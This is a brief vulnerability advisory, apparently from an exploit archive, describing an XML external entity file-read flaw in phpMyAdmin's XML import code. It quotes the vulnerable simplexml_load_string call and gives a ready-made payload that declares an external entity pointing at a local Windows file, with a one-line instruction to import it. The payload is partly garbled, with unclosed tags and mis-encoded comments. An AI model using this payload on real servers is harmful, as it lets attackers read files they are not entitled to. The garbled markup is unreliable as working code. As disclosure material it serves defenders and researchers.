phpMyAdmin suffers from a remote arbitrary file reading vulnerability when using a simplexml_load_string function meant to read xml from user input.
80sec report this bug on wooyun,PhpMyadmin use a simplexml_load_string
function to read xml from user input,this may be exploied to read files
from the server or network
in libraries/import/xml.php,some code like this
* Load the XML string
* The option LIBXML_COMPACT is specified because it can
* result in increased performance without the need to
* alter the code in any way. It's basically a freebee.
$xml = simplexml_load_string($buffer, "SimpleXMLElement", LIBXML_COMPACT);
* The XML was malformed
if ($xml === FALSE) {
so you just need to make a xml like this
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE wooyun [
<!ENTITY hi80sec SYSTEM "file:///c:/windows/win.ini">
<pma_xml_export version="1.0" xmlns:pma="">
- Structure schemas
<pma:database name="test" collation="utf8_general_ci"
<pma:table name="ts_ad">
- Êý¾Ý¿â: 'thinksns'
<database name="thinksns">
<!-- ±í ts_ad -->
then import this xml in PhpMyAdmin,you will get the content you want.